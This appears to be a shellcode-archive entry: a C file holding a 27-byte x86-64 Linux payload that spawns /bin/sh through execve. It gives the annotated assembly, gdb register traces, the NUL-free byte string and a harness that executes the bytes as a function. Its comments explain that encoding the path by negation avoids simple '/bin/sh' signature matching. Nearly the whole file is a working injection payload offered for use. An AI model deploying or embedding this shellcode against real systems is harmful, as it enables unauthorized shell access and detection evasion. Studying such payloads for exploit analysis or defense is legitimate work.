/*
 * Execute /bin/sh - 27 bytes
 * Dad` <3 baboon

; Reference: register state gdb shows at libc's execve (path in rdi,
; argv in rsi, envp in rdx):
;rdi 0x4005c4 0x4005c4
;rsi 0x7fffffffdf40 0x7fffffffdf40
;rdx 0x0 0x0
;gdb$ x/s $rdi
;0x4005c4: "/bin/sh"
;gdb$ x/s $rsi
;0x7fffffffdf40: "\304\005@"
;gdb$ x/32xb $rsi
;0x7fffffffdf40: 0xc4 0x05 0x40 0x00 0x00 0x00 0x00 0x00
;0x7fffffffdf48: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
;0x7fffffffdf50: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00
;0x7fffffffdf58: 0x55 0xb4 0xa5 0xf7 0xff 0x7f 0x00 0x00
;
;=> 0x7ffff7aeff20 <execve>: mov eax,0x3b
; 0x7ffff7aeff25 <execve+5>: syscall
;

main:
    ;mov rbx, 0x68732f6e69622f2f
    ;mov rbx, 0x68732f6e69622fff
    ;shr rbx, 0x8
    ;mov rax, 0xdeadbeefcafe1dea
    ;mov rbx, 0xdeadbeefcafe1dea
    ;mov rcx, 0xdeadbeefcafe1dea
    ;mov rdx, 0xdeadbeefcafe1dea
    xor eax, eax                    ; eax = 0
    mov rbx, 0xFF978CD091969DD1     ; two's-complement negation of "/bin/sh\0"
    neg rbx                         ; rbx = 0x0068732f6e69622f = "/bin/sh\0"
    push rbx                        ; path string now on the stack
    ;mov rdi, rsp
    push rsp
    pop rdi                         ; rdi = pointer to the path
    cdq                             ; edx = sign-extension of eax = 0, so rdx = 0
    push rdx                        ; argv terminator (NULL)
    push rdi                        ; argv[0] = pointer to the path
    ;mov rsi, rsp
    push rsp
    pop rsi                         ; rsi = argv
    mov al, 0x3b                    ; 0x3b = execve, as in the libc stub above
    syscall
*/
#include <stdio.h>
#include <string.h>
/*
 * Machine-code bytes of the 27-byte routine listed in the header comment,
 * written as one string literal per instruction. Adjacent literals are
 * concatenated by the compiler, so the array contents are identical to a
 * single literal (27 payload bytes plus the terminating NUL).
 *
 * Analysis notes:
 *  - The 8-byte immediate is the two's-complement negation of "/bin/sh\0",
 *    so the path never appears literally in these bytes; a plain string
 *    match on "/bin/sh" does not hit this buffer.
 *  - The sequence contains no zero byte, which is why strlen() reports the
 *    full length.
 */
char code[] =
    "\x31\xc0"                                  /* xor  eax, eax                */
    "\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff"  /* mov  rbx, 0xFF978CD091969DD1 */
    "\x48\xf7\xdb"                              /* neg  rbx                     */
    "\x53"                                      /* push rbx                     */
    "\x54"                                      /* push rsp                     */
    "\x5f"                                      /* pop  rdi                     */
    "\x99"                                      /* cdq                          */
    "\x52"                                      /* push rdx                     */
    "\x57"                                      /* push rdi                     */
    "\x54"                                      /* push rsp                     */
    "\x5e"                                      /* pop  rsi                     */
    "\xb0\x3b"                                  /* mov  al, 0x3b                */
    "\x0f\x05";                                 /* syscall                      */
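/*
 * Test harness: prints the length of the byte string in `code`, then
 * transfers control to it through a function-pointer cast.
 *
 * Notes for readers:
 *  - strlen() returns size_t, so the length is printed with %zu; passing a
 *    size_t to %d is undefined behaviour and misreports on LP64 targets.
 *  - strlen() stops at the first zero byte, so the printed length is only
 *    the full payload length when the bytes are NUL-free.
 *  - `code` is an initialized global, i.e. it lives in writable data. On
 *    systems that enforce NX/DEP that memory is not executable, and the
 *    indirect call below faults instead of running the bytes.
 *
 * Returns 0 if control ever comes back from the call.
 */
int main(void)
{
    printf("len:%zu bytes\n", strlen(code));

    /* Converts the data pointer to a function pointer and calls it. */
    (*(void(*)()) code)();

    return 0;
}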